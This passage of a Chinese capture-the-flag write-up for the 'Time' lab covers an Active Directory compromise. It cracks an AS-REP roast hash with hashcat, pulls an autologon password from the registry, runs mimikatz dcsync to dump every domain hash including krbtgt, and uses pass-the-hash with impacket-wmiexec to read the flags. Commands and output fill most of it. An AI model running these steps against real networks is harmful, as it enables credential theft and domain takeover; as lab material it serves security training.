$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:72d2bae127798ec3ab56405067b72fb3$f32f22f2de9cbec10e31d36d94bc609623e0754e1a53d2270e6ee291688f5de431ca42fd35d5970f714e0e335c7ad2cb4b8b58c99c557a40f206f44c6c69ac701a59dd9cfb7bee01c1153efa86aebdc93f1eecab9e29d6427e1f9c85115951b619418d9a9a52f6ac4dfb96955179ce31b9b86d716f2f12f5f717ac4eea46c6d10b2dc91adc5f6eb4cfa0dd520153122ac52445454ea65ed1417168868097457d50b2570077a3f28c55eb39f053e7fc87fb46b75c25b4585300929e89fb8338dd95e98dda3eb9d44a9f2562aef5d793987e0f4651a02c336412d47b393336af5107ca6c235197be1ec6e933e0:strawberry
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:72...e933e0
Time.Started.....: Sun Nov 16 18:32:23 2025, (1 sec)
Time.Estimated...: Sun Nov 16 18:32:24 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     8082 H/s (1.36ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1024/14344385 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> bethany
Hardware.Mon.#1..: Util: 23%

Started: Sun Nov 16 18:31:41 2025
Stopped: Sun Nov 16 18:32:25 2025

得到了密码和账号

zhangxin@xiaorang.lab
strawberry

挂代理，rdp连接上去

这里我有问题，为什么是连到25这台机器上，而不是12这台机器上呢

连上去之后看注册表,看看存没存默认的用户密码

C:\Users\zhangxin>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0xedd7ccd15
    ShutdownFlags    REG_DWORD    0x80000027
    AutoLogonSID    REG_SZ    S-1-5-21-3623938633-4064111800-2925858365-1180
    LastUsedUsername    REG_SZ    yuxuan
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    yuxuan
    DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
    DefaultDomainName    REG_SZ    xiaorang.lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey

切换账号，传猕猴桃，然后提取hash

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb 29 2020 11:13:10
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:xiaorang.lab /user:administrator
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC-PROGAME.xiaorang.lab' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 1601/1/1 8:00:00
Password last change : 2025/11/16 16:21:06
Object Security ID   : S-1-5-21-3623938633-4064111800-2925858365-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 04d93ffd6f5f6e4490e0de23f240a5e9

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 77bee309df2d6aa8d6de211e0f9bc576

* Primary:Kerberos-Newer-Keys *
    Default Salt : XIAORANG.LABAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : a7c1e1940765d04f18ac3a43d09588e96af827808f921e5855730a2a050ef007
      aes128_hmac       (4096) : 3c7453f1f392a7f8c1af77696a160f2d
      des_cbc_md5       (4096) : a8e0b35eefe9d3d0
    OldCredentials
      aes256_hmac       (4096) : a7c1e1940765d04f18ac3a43d09588e96af827808f921e5855730a2a050ef007
      aes128_hmac       (4096) : 3c7453f1f392a7f8c1af77696a160f2d
      des_cbc_md5       (4096) : a8e0b35eefe9d3d0

* Primary:Kerberos *
    Default Salt : XIAORANG.LABAdministrator
    Credentials
      des_cbc_md5       : a8e0b35eefe9d3d0
    OldCredentials
      des_cbc_md5       : a8e0b35eefe9d3d0

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  0f7990fa51442d1fc1b9f5703b7a9f53
    02  f8f3ab7a545c3df42068692e22e5fd1a
    03  63b49f8e791de04010e0d3838864fb5d
    04  0f7990fa51442d1fc1b9f5703b7a9f53
    05  7c94fce5f59a52edc7c941683f529315
    06  db3d41291d2865f07788fcd0878e9048
    07  8cffc17d1ac652e058047f177988f94f
    08  e0204b55258553e92222b39548b6bf64
    09  c024e8558b548d9ed0dac80cb3937227
    10  a55582f6895260bfb4c18eccc5e43639
    11  23cd59de8b7fc224a076a0f3001afbfa
    12  e0204b55258553e92222b39548b6bf64
    13  b4716b4fe3233db5dd79d97fe470a11b
    14  b6b21073a6bd20a1ef665cbdf3633bc9
    15  472854e67b07839a52b40ddeec245582
    16  d47433701f75461a006ab9a73a7ba33b
    17  7655b2aeae13a52426da7558382f1e98
    18  3c384e9401eb1d0467ee29affd959e98
    19  a68e52c5f665ac7f178061a140670af0
    20  51a1204a8e37e806fdfb16f0c2ffd7cb
    21  014900de757e1f20310d8c0d1fb1d812
    22  3f683ca0caafbd5e4dee3b919901066d
    23  b12255387f518480c552971cbab71ac1
    24  6c1b44f40c541a959d45423231dccef4
    25  c18dd5d14b73706c6abc66233f42ada8
    26  11a8ab9dc7e507ee0d99d3295f7c9e06
    27  d5ab194a6f297a6565e230ce525f0539
    28  3b50d0aa5201e3e934bccbe200010ddb
    29  97bafc631fb4dfe596c1a2c5e0ad19e5

mimikatz # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC-PROGAME.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
1103    shuzhen 07c1f387d7c2cf37e0ca7827393d2327        512
1104    gaiyong 52c909941c823dbe0f635b3711234d2e        512
1106    xiqidi  a55d27cfa25f3df92ad558c304292f2e        512
1107    wengbang        6b1d97a5a68c6c6c9233d11274d13a2e        512
1108    xuanjiang       a72a28c1a29ddf6509b8eabc61117c6c        512
1109    yuanchang       e1cea038f5c9ffd9dc323daf35f6843b        512
1110    lvhui   f58b31ef5da3fc831b4060552285ca54        512
1111    wenbo   9abb7115997ea03785e92542f684bdde        512
1112    zhenjun 94c84ba39c3ece24b419ab39fdd3de1a        512
1113    jinqing 4bf6ad7a2e9580bc8f19323f96749b3a        512
1115    yangju  1fa8c6b4307149415f5a1baffebe61cf        512
1117    weicheng        796a774eace67c159a65d6b86fea1d01        512
1118    weixian 8bd7dc83d84b3128bfbaf165bf292990        512
1119    haobei  045cc095cc91ba703c46aa9f9ce93df1        512
1120    jizhen  1840c5130e290816b55b4e5b60df10da        512
1121    jingze  3c8acaecc72f63a4be945ec6f4d6eeee        512
1122    rubao   d8bd6484a344214d7e0cfee0fa76df74        512
1123    zhaoxiu 694c5c0ec86269daefff4dd611305fab        512
1124    tangshun        90b8d8b2146db6456d92a4a133eae225        512
1125    liangliang      c67cd4bae75b82738e155df9dedab7c1        512
1126    qiyue   b723d29e23f00c42d97dd97cc6b04bc8        512
1127    chouqian        c6f0585b35de1862f324bc33c920328d        512
1128    jicheng 159ee55f1626f393de119946663a633c        512
1129    xiyi    ee146df96b366efaeb5138832a75603b        512
1130    beijin  a587b90ce9b675c9acf28826106d1d1d        512
1131    chenghui        08224236f9ddd68a51a794482b0e58b5        512
1132    chebin  b50adfe07d0cef27ddabd4276b3c3168        512
1133    pengyuan        a35d8f3c986ab37496896cbaa6cdfe3e        512
1134    yanglang        91c5550806405ee4d6f4521ba6e38f22        512
1135    jihuan  cbe4d79f6264b71a48946c3fa94443f5        512
1136    duanmuxiao      494cc0e2e20d934647b2395d0a102fb0        512
1137    hongzhi f815bf5a1a17878b1438773dba555b8b        512
1138    gaijin  b1040198d43631279a63b7fbc4c403af        512
1139    yifu    4836347be16e6af2cd746d3f934bb55a        512
1140    fusong  adca7ec7f6ab1d2c60eb60f7dca81be7        512
1141    luwan   c5b2b25ab76401f554f7e1e98d277a6a        512
1142    tangrong        2a38158c55abe6f6fe4b447fbc1a3e74        512
1143    zhufeng 71e03af8648921a3487a56e4bb8b5f53        512
1145    dongcheng       f2fdf39c9ff94e24cf185a00bf0a186d        512
1146    lianhuangchen   23dc8b3e465c94577aa8a11a83c001af        512
1147    lili    b290a36500f7e39beee8a29851a9f8d5        512
1148    huabi   02fe5838de111f9920e5e3bb7e009f2f        512
1149    rangsibo        103d0f70dc056939e431f9d2f604683c        512
1150    wohua   cfcc49ec89dd76ba87019ca26e5f7a50        512
1151    haoguang        33efa30e6b3261d30a71ce397c779fda        512
1152    langying        52a8a125cd369ab16a385f3fcadc757d        512
1153    diaocai a14954d5307d74cd75089514ccca097a        512
1154    lianggui        4ae2996c7c15449689280dfaec6f2c37        512
1155    manxue  0255c42d9f960475f5ad03e0fee88589        512
1156    baqin   327f2a711e582db21d9dd6d08f7bdf91        512
1157    chengqiu        0d0c1421edf07323c1eb4f5665b5cb6d        512
1158    louyou  a97ba112b411a3bfe140c941528a4648        512
1159    maqun   485c35105375e0754a852cee996ed33b        512
1160    wenbiao 36b6c466ea34b2c70500e0bfb98e68bc        512
1161    weishengshan    f60a4233d03a2b03a7f0ae619c732fae        512
1163    chuyuan 0cfdca5c210c918b11e96661de82948a        512
1164    wenliang        a4d2bacaf220292d5fdf9e89b3513a5c        512
1165    yulvxue cf970dea0689db62a43b272e2c99dccd        512
1166    luyue   274d823e941fc51f84ea323e22d5a8c4        512
1167    ganjian 7d3c39d94a272c6e1e2ffca927925ecc        512
1168    pangzhen        51d37e14983a43a6a45add0ae8939609        512
1169    guohong d3ce91810c1f004c782fe77c90f9deb6        512
1170    lezhong dad3990f640ccec92cf99f3b7be092c7        512
1171    sheweiyue       d17aecec7aa3a6f4a1e8d8b7c2163b35        512
1172    dujian  8f7846c78f03bf55685a697fe20b0857        512
1173    lidongjin       34638b8589d235dea49e2153ae89f2a1        512
1174    hongqun 6c791ef38d72505baeb4a391de05b6e1        512
1175    yexing  34842d36248c2492a5c9a1ae5d850d54        512
1176    maoda   6e65c0796f05c0118fbaa8d9f1309026        512
1177    qiaomei 6a889f350a0ebc15cf9306687da3fd34        512
502     krbtgt  a4206b127773884e2c7ea86cdd282d9c        514
1178    wenshao b31c6aa5660d6e87ee046b1bb5d0ff79        4260352
500     Administrator   04d93ffd6f5f6e4490e0de23f240a5e9        512
1000    DC-PROGAME$     a13c5b70e58289485abf99c9f0cda48b        532480
1181    WIN2019$        2772fb77ea4ad12ea5465f1cf3e0be83        4096
1180    yuxuan  376ece347142d1628632d440530e8eed        66048
1179    zhangxin        d6c5976e07cdb410be19b84126367e3d        4260352

得到域控的hash

Administrator   04d93ffd6f5f6e4490e0de23f240a5e9

直接横向去读取即可

为什么一定得是大写的呢，为什么横向就能读取到了呢，为什么直接 DCSync 获取域管的hash，为什么域管的hash不是DC的那台机器呢

──(root㉿kali)-[/home/kali]
└─# proxychains impacket-wmiexec  XIAORANG/administrator@172.22.6.25   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.25:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.25:135  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.25:49888  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\flag\flag*

C:\Users\Administrator\flag\flag03.txt


flag03: flag{7af6ade3-bcb3-43ba-b7af-0e0a78a70e49}


Maybe you can find something interesting on this server. 
=======================================
What you may not know is that many objects in this domain 
are moved from other domains.

flag4

┌──(root㉿kali)-[/home/kali]
└─# proxychains impacket-wmiexec  XIAORANG/administrator@172.22.6.12   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.12:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.12:135  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.12:49668  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\flag\flag*

C:\Users\Administrator\flag\flag04.txt


Awesome! you got the final flag.

::::::::::::::::::::::::::    :::: :::::::::: 
    :+:        :+:    +:+:+: :+:+:+:+:        
    +:+        +:+    +:+ +:+:+ +:++:+        
    +#+        +#+    +#+  +:+  +#++#++:++#   
    +#+        +#+    +#+       +#++#+        
    #+#        #+#    #+#       #+##+#        
    ###    ##############       ############# 


flag04: flag{f7a91977-3ec8-4207-9fd4-f031d5c20766}

现在我所写的这篇wp，看下来是不是毫无逻辑，根本啥都不是，所以我接下来要有逻辑，有更多操作的重新进行一次详细的解析，告诉大家为什么要这么做，这么做的目的和原理是什么，为什么可以这么做而不能那么做

敬请期待 春秋云镜Time复盘-详细版